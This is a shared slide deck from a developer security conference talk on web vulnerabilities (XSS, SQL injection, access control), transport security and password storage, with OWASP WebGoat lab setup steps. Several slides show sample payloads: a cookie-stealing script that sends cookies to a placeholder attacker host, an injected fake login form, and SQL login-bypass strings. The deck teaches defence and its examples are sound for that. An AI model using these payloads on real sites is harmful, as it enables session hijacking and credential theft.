Michael Coates, profile picture
Uploaded byMichael Coates
PDF, PPTX19,025 views

Devbeat Conference - Developer First Security

The document discusses developer-first security, emphasizing the importance of integrating security into the development process due to the rising costs of cybercrime. It highlights various application vulnerabilities such as cross-site scripting (XSS) and SQL injection, providing testing methods, impacts, and prevention strategies. The content also underscores the significance of strong access controls, secure data storage, and how to anticipate and defend against emerging threats.

Embed presentation

Download as PDF, PPTX
Developer-first security Integrating Security into Development Michael Coates ! michael@ShapeSecurity.com michael-coates.blogspot.com @_mwc
About Me michael@shapesecurity.com
Reality
“The global cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine” ! h"p://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking   h"p://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/  
Data Loss & Breaches datalossdb.org Verizon Data Breach Report 2013
Outside Attackers datalossdb.org Verizon Data Breach Report 2013
Security - Into The Details • Sample and Demo of Top Application Risks
 — Cross Site Scripting, SQL Injection, Access Control • Who’s Monitoring Your Traffic?
 — Encrypting in Transit • Secure Data Storage & Protection
 — Correct Password Storage & Data Protection • Growing Threats Plaguing Applications
WARNING Security Testing is ILLEGAL ON UNAUTHORIZED SYSTEMS
3 Dangerous Vulnerabilities Cross Site Scripting SQL Injection Access Control
What are Web Requests Open console & enter the following:
 • 
 telnet google.com 80
 GET / HTTP/1.1 • Hit return 2 times
Cross Site Scripting (XSS) • Problem: User controlled data returned in HTTP response contains HTML/JavaScript code • Impact: Session Hijacking, Full Control of Page, Malicious Redirects • Basic XSS Test:
 " ><script>alert(document.cookie)</script> • Cookie Theft Example:
 "><script>document.location='http://attackersite/ '+document.cookie</script>
XSS Behind The Scenes http://shinypage.com?user=Bob JSP Code <h1>Glad to see you <%= request.getParameter("name") %></h1> HTML Source Rendered HTML <div>Glad to see you <b>Bob</b></div>
XSS Behind The Scenes http://shinypage.com?user=friend</b>
 <br><form method=”post” action=”badsite.com/login”> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
XSS - Injecting HTML Rendered HTML
Cross Site Scripting • Cross Site Scripting typically uses JavaScript to do bad things • Steal session cookies <script>alert(document.cookie)</script> • Redirect to bad pages 
 <script>window.location = "http://evilsite.com/"</script> • Rewrite page on the fly
Lab! - Reflected XSS
Reflected XSS Lab • Lesson: Cross-Site Scripting->Reflected XSS Attacks • Proxy Not Needed
Lab! - Stored XSS
Stored XSS Lab • Lesson: Cross-Site Scripting>Stored XSS Attacks • Proxy Not Needed
XSS Prevention • Solution
 1. Output Encoding - converts command characters to benign characters for display
 2. Input Validation <h1>Glad to see you <%=encodeForHTML( request.getParameter("name") ) %></h1> < > “ ‘ & HTML Encoding &lt; &gt; &quote; &#x27; &amp;
XSS Attempt Revisited http://shinypage.com?user=friend</b>
 <br><form method=”post” action=”badsite.com/login”> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
Safe Handling Rendered HTML Glad to see you friend</b>
 <br><form method="post" action="badsite.com/ login"> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
XSS Resources • OWASP XSS Prevention Cheat Sheet 
 - http://bit.ly/XSS-OWASP • Content Security Policy 
 - http://bit.ly/CSP-OWASP • OWASP XSS Overview 
 - http://bit.ly/OWASPXSS
SQL Injection • Problem: User controlled data improperly used with SQL statements • Impact: Arbitrary SQL Execution, Data Corruption, Data Theft • Basic SQL Injection Tests:
 OR 1=1 --
 ' OR '1'= '1'-- • Example Vulnerable Query:
 sqlQ = “Select user from UserTable where name= '+username+ ' and pass = '+password+ ' ”
Lab! - SQL Lesson
SQL Injection • Lesson: Injection Flaws -> Lab: SQL Injection -> Stage 1: String SQL Injection • Proxy Needed • Objective: Bypass the login page by inserting “control” characters. Login as “Neville” w/o knowledge of the password
SQL Injection • HTTP Post
 employee_id=112&password=x' OR ‘1'='1 &action=Login • Vulnerable SQL
 Select user from UserTable where name= '+username+ ' and pass = '+password+ ‘ • Resulting Statement
 Select user from UserTable where name= '112' and 
 pass = 'x' OR '1'='1' • Result: ... name = ' 112 ' and pass = 'x ' OR TRUE
SQL Injection • Parameterized Queries
 No confusion with control characters
 Example: would look for password of ‘ or ‘1’=’1 • Input Validation
 Are special characters needed for most fields?
 What about non-printable characters %00-%0A?

SQL Injection Resources • https://www.owasp.org/index.php/ SQL_Injection_Prevention_Cheat_Sheet
Access Control • Problem: Developers assume some parts of app can’t be seen, tampered with or invoked by the user • Impact: Unauthorized data access, access to privileged functionality • Basic Access Control Test: Inspect HTTP requests - iterate numbers, guess other values for arguments • Access Control Failure Example:! • http://somebadbank.com/showacct?id=101 • http://somebadbank.com/showacct?id=102

Lab! - Access Control
Access Control Violation • Lesson: Access Control Flaws>LAB: Role Based Access Control->Stage 1: Bypass Business Layer Access Control • Proxy Needed • Objective: Find way to execute “delete” functionality using Tom’s account. Delete account “tom”
Access Control Violation • Hint: Login with Tom and perform available actions (search staff, view profile). Figure out how action name is sent to server POST /webgoat/attack?Screen=43&menu=200 HTTP/1.1 Host: localhost ! employee_id=105&action=ViewProfile
Strong Access Controls • Access Control Performed Server Side • Never Relies Upon “Security by Obscurity” • Be Careful with Identifiers (e.g. id=123) • Attacker Can Send Anything in Request • Presentation Layer Controls Can Not Enforce Access Control
Access Control Resources • https://www.owasp.org/index.php/ Access_Control_Cheat_Sheet
Who’s Monitoring Your Traffic?
Insecure Session Management • Secure login over HTTPS • • Password submitted encrypted Immediate redirect to HTTP • Session ID sent cleartext <-- vulnerability point https://site.com/login http://site.com/profile
Vulnerable Redirects • User requests HTTP page, response redirects HTTPS • 302 Response is HTTP <-- Vulnerability Point
Secure Design for Communication • Use HTTPS Throughout Web Site! • HTTP Strict Transport Security (HSTS)! • • • Opt-in security control Website instructs compatible browser to enable STS for site HSTS Forces (for enabled site): • All communication over HTTPS • No insecure HTTP requests sent from browser • No option for user to override untrusted certificates
Strict Transport Security • Browser prevents HTTP requests to HSTS site • Any request to site is “upgraded” to HTTPS • No clear text HTTP traffic ever sent to HSTS site • Browser assumes HTTPS for HSTS sites
Secure Data Storage & Protection
Password Storage Bad Approaches! • Your own algorithm • Good Approach! md5 encryption • base64 encoding • rot 13 PBKDF2 sha1 • Bcrypt • • • + Per User Salt
What Are We Protecting? Correct password hashing protects against:! ! • Offline attacks of password repository ! • Brute Force, Rainbow Attacks ! Does not address:! Guessing easy passwords Password theft, disclosure Session Hijacking Credential Stuffing
Architecture for Sensitive Data https://site.com web server internal SSL database Monitor Database Queries & Response Size
Encrypting Sensitive Data in Database Encrypt User Data Customer/Group Encryption Key Key Encrypting Key database Decrypt Hardware Security Module Encrypted [Customer/Group Encryption Key] Encryption within Database
 Unique keys per data region
 Key encrypting keys
 Hardware Security Modules (
Growing Threats Plaguing Applications
Denial of Service Denial of Service (DOS) Distributed Denial of Service (DDOS)
Denial of Service Network DDOS Application Layer DDOS site.com/generateReport Exhaust Network! Bandwidth Exhaust Server ! CPU/Memory
Application Denial of Service Application DDOS ! Traditional Network DDOS ! • overwhelms target with volume • • • • exhausts bandwidth / capacity of network devices invokes computationally intense application functions • exhausts CPU / memory of web servers Requires large number of machines • Requires few machines • Defenses: Few available, must customize Defenses: CDN, antiDDOS services
Credential Stuffing compromised! server! Credentials! joe: abc123! sue: password1! bob: MyP0n3y Stolen Credentials! joe: abc123! sue: password1! bob: MyP0n3y sue:password1 joe: abc123 https://site.com/login!
Take Aways • Understand top security threats and anticipate potential malicious use of application to design secure code • Multiple controls possible to protect sensitive data in transit and storage • Understand emerging threats to plan for appropriate defenses • Use OWASP BWA Security Lab and learn more!
Thanks! michael@ShapeSecurity.com http://michael-coates.blogspot.com @_mwc
Virtual Security Training Lab Setup
Software • Vulnerable Server: OWASP’s Webgoat • Proxy Tool - OWASP’s ZAP (Zed Attack Proxy) • Browser • Virtual Machine: OWASP Broken Web App VM
Test Connectivity to VM 1.Open Browser 2.Browse to your VM ip (listed in VM login page) • e.g. http://192.168.56.101 3.Should see OWASP BWA welcome page 4.Error? Check ip address of VM
WebGoat • Click First Link - OWASP WebGoat version 5.3.x • Username / Password is guest / guest
Understanding the Proxy • Proxy is middle-man between browser and web server • Assists with traffic manipulation & inspection Attacker’s Browser Web Proxy Web Server
Understanding the Proxy Primary OS Browser Web Proxy Your Computer VM Web Server
Enabling Proxy 1.Open ZAP 2.Configure Firefox to use proxy 3.Resend Request 4.Confirm received by proxy 5.Forward to web server (vm)
Using A Proxy • ZAP - Configure to listen on 8080
Set Firefox Proxy • Set Firefox proxy to 8080 • Preferences 
 -> Advanced 
 -> Network 
 -> Settings • Set HTTP Proxy • Important - clear 
 “No Proxy for” line
Confirm Setup Works • Refresh Web Browser • Go to ZAP • See site in left-hand column
Intercepting Traffic • Add a “breakpoint” by right clicking on the page and choosing “Break...” ! ! ! ! • Refresh the webpage - it will hang • Modify the request as needed, then press the “Continue” button
“Hello World” of Proxies • Lesson: General->Http Basic • Objective: • Enter your name into text box • Intercept with proxy & change entered name to different value • Receive response & observe modified value is reversed Joe Sue euS Attacker’s euS Web Proxy Browser Web Server

More Related Content

PDF
Web App Security Presentation by Ryan Holland - 05-31-2017
byTriNimbus
 
PPTX
Self Defending Applications
byMichael Coates
 
PPTX
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
bySecurity Innovation
 
PPTX
Web application security: Threats & Countermeasures
byAung Thu Rha Hein
 
PDF
Secure Web Services
byRob Daigneau
 
PPTX
Security in an Interconnected and Complex World of Software
byMichael Coates
 
PPTX
2013 michael coates-javaone
byMichael Coates
 
PDF
The Web Application Hackers Toolchain
byjasonhaddix
 
Web App Security Presentation by Ryan Holland - 05-31-2017
byTriNimbus
 
Self Defending Applications
byMichael Coates
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
bySecurity Innovation
 
Web application security: Threats & Countermeasures
byAung Thu Rha Hein
 
Secure Web Services
byRob Daigneau
 
Security in an Interconnected and Complex World of Software
byMichael Coates
 
2013 michael coates-javaone
byMichael Coates
 
The Web Application Hackers Toolchain
byjasonhaddix
 

What's hot

PDF
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
byAll Things Open
 
PDF
Chapter 13 web security
bynewbie2019
 
PPTX
Application Security-Understanding The Horizon
byLalit Kale
 
PPTX
Security testing
byKhizra Sammad
 
PPTX
Security Testing Training With Examples
byAlwin Thayyil
 
PDF
Security testing presentation
byConfiz
 
PPTX
Owasp top 10 vulnerabilities
byOWASP Delhi
 
PDF
OWASP Top Ten in Practice
bySecurity Innovation
 
PDF
Evil User Stories - Improve Your Application Security
byAnne Oikarinen
 
PPTX
OWASP Top Ten 2017
byMichael Furman
 
PDF
AppSec in an Agile World
byDavid Lindner
 
PPTX
OWASP Top 10 - 2017 Top 10 web application security risks
byKun-Da Wu
 
PPTX
OWASP Top 10 Proactive Controls
byKaty Anton
 
PPTX
ZeroNights2013 testing of password policy
byAnton Dedov
 
PDF
Web Security - Introduction v.1.3
byOles Seheda
 
PDF
Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...
byRuby Meditation
 
PDF
Top 10 web application security risks akash mahajan
byAkash Mahajan
 
PPTX
Web Application Security - DevFest + GDay George Town 2016
byGareth Davies
 
PPTX
Anatomy Web Attack
byKelly Speiser
 
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
byAll Things Open
 
Chapter 13 web security
bynewbie2019
 
Application Security-Understanding The Horizon
byLalit Kale
 
Security testing
byKhizra Sammad
 
Security Testing Training With Examples
byAlwin Thayyil
 
Security testing presentation
byConfiz
 
Owasp top 10 vulnerabilities
byOWASP Delhi
 
OWASP Top Ten in Practice
bySecurity Innovation
 
Evil User Stories - Improve Your Application Security
byAnne Oikarinen
 
OWASP Top Ten 2017
byMichael Furman
 
AppSec in an Agile World
byDavid Lindner
 
OWASP Top 10 - 2017 Top 10 web application security risks
byKun-Da Wu
 
OWASP Top 10 Proactive Controls
byKaty Anton
 
ZeroNights2013 testing of password policy
byAnton Dedov
 
Web Security - Introduction v.1.3
byOles Seheda
 
Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...
byRuby Meditation
 
Top 10 web application security risks akash mahajan
byAkash Mahajan
 
Web Application Security - DevFest + GDay George Town 2016
byGareth Davies
 
Anatomy Web Attack
byKelly Speiser
 

Similar to Devbeat Conference - Developer First Security

PPT
Intro to Web Application Security
byRob Ragan
 
PPTX
webapplicationattacks-101005070110-phpapp02.pptx
bySyedAliShahid3
 
PDF
Secure Coding BSSN Semarang Material.pdf
bynanangAris1
 
PPTX
OWASP top 10-2013
bytmd800
 
PDF
Solvay secure application layer v2015 seba
bySebastien Deleersnyder
 
PDF
Secure coding presentation Oct 3 2020
byMoataz Kamel
 
PPTX
ASP.NET Web Security
bySharePointRadi
 
PPTX
6 - Web Application Security.pptx
byAlmaOraevi
 
PDF
Web Security Threats and Solutions
byIvo Andreev
 
PPTX
Owasp web security
byPankaj Kumar Sharma
 
PDF
The top 10 security issues in web applications
byDevnology
 
PDF
2013 OWASP Top 10
bybilcorry
 
PDF
Web security and OWASP
byIsuru Samaraweera
 
PDF
Owasp top 10 2013
byEdouard de Lansalut
 
PPSX
Web application security
byAkhil Raj
 
PPTX
Application and Website Security -- Fundamental Edition
byDaniel Owens
 
PPT
Phpnw security-20111009
byPaul Lemon
 
PPTX
ASP.NET security vulnerabilities
byAleksandar Bozinovski
 
PPT
Web Apps Security
byVictor Bucutea
 
PPTX
Top web apps security vulnerabilities
byAleksandar Bozinovski
 
Intro to Web Application Security
byRob Ragan
 
webapplicationattacks-101005070110-phpapp02.pptx
bySyedAliShahid3
 
Secure Coding BSSN Semarang Material.pdf
bynanangAris1
 
OWASP top 10-2013
bytmd800
 
Solvay secure application layer v2015 seba
bySebastien Deleersnyder
 
Secure coding presentation Oct 3 2020
byMoataz Kamel
 
ASP.NET Web Security
bySharePointRadi
 
6 - Web Application Security.pptx
byAlmaOraevi
 
Web Security Threats and Solutions
byIvo Andreev
 
Owasp web security
byPankaj Kumar Sharma
 
The top 10 security issues in web applications
byDevnology
 
2013 OWASP Top 10
bybilcorry
 
Web security and OWASP
byIsuru Samaraweera
 
Owasp top 10 2013
byEdouard de Lansalut
 
Web application security
byAkhil Raj
 
Application and Website Security -- Fundamental Edition
byDaniel Owens
 
Phpnw security-20111009
byPaul Lemon
 
ASP.NET security vulnerabilities
byAleksandar Bozinovski
 
Web Apps Security
byVictor Bucutea
 
Top web apps security vulnerabilities
byAleksandar Bozinovski
 

More from Michael Coates

KEY
Cross Site Scripting - Mozilla Security Learning Center
byMichael Coates
 
KEY
SQL Injection - Mozilla Security Learning Center
byMichael Coates
 
KEY
Bug Bounty Programs For The Web
byMichael Coates
 
PDF
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
byMichael Coates
 
PDF
Sf startup-security
byMichael Coates
 
PDF
SSL Screw Ups
byMichael Coates
 
PDF
Real Time Application Defenses - The Reality of AppSensor & ESAPI
byMichael Coates
 
Cross Site Scripting - Mozilla Security Learning Center
byMichael Coates
 
SQL Injection - Mozilla Security Learning Center
byMichael Coates
 
Bug Bounty Programs For The Web
byMichael Coates
 
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
byMichael Coates
 
Sf startup-security
byMichael Coates
 
SSL Screw Ups
byMichael Coates
 
Real Time Application Defenses - The Reality of AppSensor & ESAPI
byMichael Coates
 

Recently uploaded

PDF
Louisville User Group: Transforming Technical Debt into Technical Wealth
byLynda Kane
 
PDF
Building Software in the AI Era: Spec-Driven Development with Kiro IDE
byHaim Michael
 
PPTX
Software Tools for penetration Testing (1).pptx
byAmosCheruiyot13
 
PDF
oracle_apex_tamil_export_an_application.pdf
byUthamaselvan M
 
PPTX
DVCON24-IBM ai/ml driven hardware verification
byArun Joseph
 
PDF
Chapter 1 Introduction to Computer Security.pdf
byGetnet Tigabie Askale -(GM)
 
PPTX
DATALIVA-Presentation-EN_2026 Budgeting SAP Odoo ERP
byMustafa Kuğu
 
PPTX
Information about Trusted Platform Module(TPM)
bynewtoknow techs
 
PPTX
On-Device AI with Gemma 3n and PaliGemma 2 Session Slides - GDG VESIT
bygdgcodecellcmpn
 
PDF
DataLiva-LivaGRC- Business Software for Governance, Risk, and Compliance
byMustafa Kuğu
 
PDF
Mobile Onboarding UX 11 Best Practices for Retention (2026).pdf
byDesign Studio UI UX
 
PPTX
TechSprint Kickoff - Everything You Need to Know
bygdgcodecellcmpn
 
PDF
Azure Identity, Governance, and Monitoring solutions
byVICTOR MAESTRE RAMIREZ
 
PPTX
Visual Foxpro-VFP9-Access-Report-Variable-Outside-the-report.pptx
bymanojbkalla
 
PDF
Strengthening cybern resilience for a leading indian Financial Services group
bypandeydevika621
 
PPTX
SRWE_Module_14_SRWE_ccna_basics_routing_concepts.pptx
byahmedmahmoudece
 
PDF
How to Connect HP LaserJet MFP M234dwe to WiFi
byPrinter Tales
 
PPTX
Sensors-and-Actuators-in-IoT-Systems.pptx
byMuhammedNihal54
 
PDF
splunk-peak-threat-hunting-framework.pdf
bylobster6719
 
PDF
The CISO_Transformation_Playbook From Cost Centre to Chief Trust Officer
bysajjasridhar1990
 
Louisville User Group: Transforming Technical Debt into Technical Wealth
byLynda Kane
 
Building Software in the AI Era: Spec-Driven Development with Kiro IDE
byHaim Michael
 
Software Tools for penetration Testing (1).pptx
byAmosCheruiyot13
 
oracle_apex_tamil_export_an_application.pdf
byUthamaselvan M
 
DVCON24-IBM ai/ml driven hardware verification
byArun Joseph
 
Chapter 1 Introduction to Computer Security.pdf
byGetnet Tigabie Askale -(GM)
 
DATALIVA-Presentation-EN_2026 Budgeting SAP Odoo ERP
byMustafa Kuğu
 
Information about Trusted Platform Module(TPM)
bynewtoknow techs
 
On-Device AI with Gemma 3n and PaliGemma 2 Session Slides - GDG VESIT
bygdgcodecellcmpn
 
DataLiva-LivaGRC- Business Software for Governance, Risk, and Compliance
byMustafa Kuğu
 
Mobile Onboarding UX 11 Best Practices for Retention (2026).pdf
byDesign Studio UI UX
 
TechSprint Kickoff - Everything You Need to Know
bygdgcodecellcmpn
 
Azure Identity, Governance, and Monitoring solutions
byVICTOR MAESTRE RAMIREZ
 
Visual Foxpro-VFP9-Access-Report-Variable-Outside-the-report.pptx
bymanojbkalla
 
Strengthening cybern resilience for a leading indian Financial Services group
bypandeydevika621
 
SRWE_Module_14_SRWE_ccna_basics_routing_concepts.pptx
byahmedmahmoudece
 
How to Connect HP LaserJet MFP M234dwe to WiFi
byPrinter Tales
 
Sensors-and-Actuators-in-IoT-Systems.pptx
byMuhammedNihal54
 
splunk-peak-threat-hunting-framework.pdf
bylobster6719
 
The CISO_Transformation_Playbook From Cost Centre to Chief Trust Officer
bysajjasridhar1990
 

Devbeat Conference - Developer First Security

  • 1.
    Developer-first security Integrating Securityinto Development Michael Coates ! michael@ShapeSecurity.com michael-coates.blogspot.com @_mwc
  • 2.
  • 3.
  • 4.
    “The global costof cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine” ! h"p://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking   h"p://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/  
  • 5.
    Data Loss &Breaches datalossdb.org Verizon Data Breach Report 2013
  • 6.
  • 7.
    Security - IntoThe Details • Sample and Demo of Top Application Risks
 — Cross Site Scripting, SQL Injection, Access Control • Who’s Monitoring Your Traffic?
 — Encrypting in Transit • Secure Data Storage & Protection
 — Correct Password Storage & Data Protection • Growing Threats Plaguing Applications
  • 8.
    WARNING Security Testing is ILLEGALON UNAUTHORIZED SYSTEMS
  • 9.
    3 Dangerous Vulnerabilities Cross SiteScripting SQL Injection Access Control
  • 10.
    What are WebRequests Open console & enter the following:
 • 
 telnet google.com 80
 GET / HTTP/1.1 • Hit return 2 times
  • 11.
    Cross Site Scripting(XSS) • Problem: User controlled data returned in HTTP response contains HTML/JavaScript code • Impact: Session Hijacking, Full Control of Page, Malicious Redirects • Basic XSS Test:
 " ><script>alert(document.cookie)</script> • Cookie Theft Example:
 "><script>document.location='http://attackersite/ '+document.cookie</script>
  • 12.
    XSS Behind TheScenes http://shinypage.com?user=Bob JSP Code <h1>Glad to see you <%= request.getParameter("name") %></h1> HTML Source Rendered HTML <div>Glad to see you <b>Bob</b></div>
  • 13.
    XSS Behind TheScenes http://shinypage.com?user=friend</b>
 <br><form method=”post” action=”badsite.com/login”> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
  • 14.
    XSS - InjectingHTML Rendered HTML
  • 15.
    Cross Site Scripting • CrossSite Scripting typically uses JavaScript to do bad things • Steal session cookies <script>alert(document.cookie)</script> • Redirect to bad pages 
 <script>window.location = "http://evilsite.com/"</script> • Rewrite page on the fly
  • 16.
  • 17.
    Reflected XSS Lab • Lesson:Cross-Site Scripting->Reflected XSS Attacks • Proxy Not Needed
  • 18.
  • 19.
    Stored XSS Lab • Lesson:Cross-Site Scripting>Stored XSS Attacks • Proxy Not Needed
  • 20.
    XSS Prevention • Solution
 1. OutputEncoding - converts command characters to benign characters for display
 2. Input Validation <h1>Glad to see you <%=encodeForHTML( request.getParameter("name") ) %></h1> < > “ ‘ & HTML Encoding &lt; &gt; &quote; &#x27; &amp;
  • 21.
    XSS Attempt Revisited http://shinypage.com?user=friend</b>
 <br><formmethod=”post” action=”badsite.com/login”> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
  • 22.
    Safe Handling Rendered HTML Gladto see you friend</b>
 <br><form method="post" action="badsite.com/ login"> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
  • 23.
    XSS Resources • OWASP XSSPrevention Cheat Sheet 
 - http://bit.ly/XSS-OWASP • Content Security Policy 
 - http://bit.ly/CSP-OWASP • OWASP XSS Overview 
 - http://bit.ly/OWASPXSS
  • 24.
    SQL Injection • Problem: Usercontrolled data improperly used with SQL statements • Impact: Arbitrary SQL Execution, Data Corruption, Data Theft • Basic SQL Injection Tests:
 OR 1=1 --
 ' OR '1'= '1'-- • Example Vulnerable Query:
 sqlQ = “Select user from UserTable where name= '+username+ ' and pass = '+password+ ' ”
  • 25.
    Lab! - SQLLesson
  • 26.
    SQL Injection • Lesson: InjectionFlaws -> Lab: SQL Injection -> Stage 1: String SQL Injection • Proxy Needed • Objective: Bypass the login page by inserting “control” characters. Login as “Neville” w/o knowledge of the password
  • 27.
    SQL Injection • HTTP Post
 employee_id=112&password=x'OR ‘1'='1 &action=Login • Vulnerable SQL
 Select user from UserTable where name= '+username+ ' and pass = '+password+ ‘ • Resulting Statement
 Select user from UserTable where name= '112' and 
 pass = 'x' OR '1'='1' • Result: ... name = ' 112 ' and pass = 'x ' OR TRUE
  • 28.
    SQL Injection • Parameterized Queries
 Noconfusion with control characters
 Example: would look for password of ‘ or ‘1’=’1 • Input Validation
 Are special characters needed for most fields?
 What about non-printable characters %00-%0A?

  • 29.
  • 30.
    Access Control • Problem: Developersassume some parts of app can’t be seen, tampered with or invoked by the user • Impact: Unauthorized data access, access to privileged functionality • Basic Access Control Test: Inspect HTTP requests - iterate numbers, guess other values for arguments • Access Control Failure Example:! • http://somebadbank.com/showacct?id=101 • http://somebadbank.com/showacct?id=102

  • 31.
  • 32.
    Access Control Violation • Lesson:Access Control Flaws>LAB: Role Based Access Control->Stage 1: Bypass Business Layer Access Control • Proxy Needed • Objective: Find way to execute “delete” functionality using Tom’s account. Delete account “tom”
  • 33.
    Access Control Violation • Hint:Login with Tom and perform available actions (search staff, view profile). Figure out how action name is sent to server POST /webgoat/attack?Screen=43&menu=200 HTTP/1.1 Host: localhost ! employee_id=105&action=ViewProfile
  • 34.
    Strong Access Controls • AccessControl Performed Server Side • Never Relies Upon “Security by Obscurity” • Be Careful with Identifiers (e.g. id=123) • Attacker Can Send Anything in Request • Presentation Layer Controls Can Not Enforce Access Control
  • 35.
  • 36.
  • 37.
    Insecure Session Management • Secure loginover HTTPS • • Password submitted encrypted Immediate redirect to HTTP • Session ID sent cleartext <-- vulnerability point https://site.com/login http://site.com/profile
  • 38.
    Vulnerable Redirects • User requestsHTTP page, response redirects HTTPS • 302 Response is HTTP <-- Vulnerability Point
  • 39.
    Secure Design for Communication • UseHTTPS Throughout Web Site! • HTTP Strict Transport Security (HSTS)! • • • Opt-in security control Website instructs compatible browser to enable STS for site HSTS Forces (for enabled site): • All communication over HTTPS • No insecure HTTP requests sent from browser • No option for user to override untrusted certificates
  • 40.
    Strict Transport Security • Browserprevents HTTP requests to HSTS site • Any request to site is “upgraded” to HTTPS • No clear text HTTP traffic ever sent to HSTS site • Browser assumes HTTPS for HSTS sites
  • 41.
  • 42.
    Password Storage Bad Approaches! • Yourown algorithm • Good Approach! md5 encryption • base64 encoding • rot 13 PBKDF2 sha1 • Bcrypt • • • + Per User Salt
  • 43.
    What Are WeProtecting? Correct password hashing protects against:! ! • Offline attacks of password repository ! • Brute Force, Rainbow Attacks ! Does not address:! Guessing easy passwords Password theft, disclosure Session Hijacking Credential Stuffing
  • 44.
    Architecture for Sensitive Data https://site.com webserver internal SSL database Monitor Database Queries & Response Size
  • 45.
    Encrypting Sensitive Datain Database Encrypt User Data Customer/Group Encryption Key Key Encrypting Key database Decrypt Hardware Security Module Encrypted [Customer/Group Encryption Key] Encryption within Database
 Unique keys per data region
 Key encrypting keys
 Hardware Security Modules (
  • 46.
  • 47.
    Denial of Service Denialof Service (DOS) Distributed Denial of Service (DDOS)
  • 48.
    Denial of Service NetworkDDOS Application Layer DDOS site.com/generateReport Exhaust Network! Bandwidth Exhaust Server ! CPU/Memory
  • 49.
    Application Denial of Service ApplicationDDOS ! Traditional Network DDOS ! • overwhelms target with volume • • • • exhausts bandwidth / capacity of network devices invokes computationally intense application functions • exhausts CPU / memory of web servers Requires large number of machines • Requires few machines • Defenses: Few available, must customize Defenses: CDN, antiDDOS services
  • 50.
    Credential Stuffing compromised! server! Credentials! joe: abc123! sue:password1! bob: MyP0n3y Stolen Credentials! joe: abc123! sue: password1! bob: MyP0n3y sue:password1 joe: abc123 https://site.com/login!
  • 51.
    Take Aways • Understand topsecurity threats and anticipate potential malicious use of application to design secure code • Multiple controls possible to protect sensitive data in transit and storage • Understand emerging threats to plan for appropriate defenses • Use OWASP BWA Security Lab and learn more!
  • 52.
  • 53.
  • 54.
    Software • Vulnerable Server: OWASP’sWebgoat • Proxy Tool - OWASP’s ZAP (Zed Attack Proxy) • Browser • Virtual Machine: OWASP Broken Web App VM
  • 55.
    Test Connectivity toVM 1.Open Browser 2.Browse to your VM ip (listed in VM login page) • e.g. http://192.168.56.101 3.Should see OWASP BWA welcome page 4.Error? Check ip address of VM
  • 56.
    WebGoat • Click First Link- OWASP WebGoat version 5.3.x • Username / Password is guest / guest
  • 57.
    Understanding the Proxy • Proxyis middle-man between browser and web server • Assists with traffic manipulation & inspection Attacker’s Browser Web Proxy Web Server
  • 58.
    Understanding the Proxy PrimaryOS Browser Web Proxy Your Computer VM Web Server
  • 59.
    Enabling Proxy 1.Open ZAP 2.ConfigureFirefox to use proxy 3.Resend Request 4.Confirm received by proxy 5.Forward to web server (vm)
  • 60.
    Using A Proxy • ZAP- Configure to listen on 8080
  • 61.
    Set Firefox Proxy • SetFirefox proxy to 8080 • Preferences 
 -> Advanced 
 -> Network 
 -> Settings • Set HTTP Proxy • Important - clear 
 “No Proxy for” line
  • 62.
    Confirm Setup Works • RefreshWeb Browser • Go to ZAP • See site in left-hand column
  • 63.
    Intercepting Traffic • Add a“breakpoint” by right clicking on the page and choosing “Break...” ! ! ! ! • Refresh the webpage - it will hang • Modify the request as needed, then press the “Continue” button
  • 64.
    “Hello World” ofProxies • Lesson: General->Http Basic • Objective: • Enter your name into text box • Intercept with proxy & change entered name to different value • Receive response & observe modified value is reversed Joe Sue euS Attacker’s euS Web Proxy Browser Web Server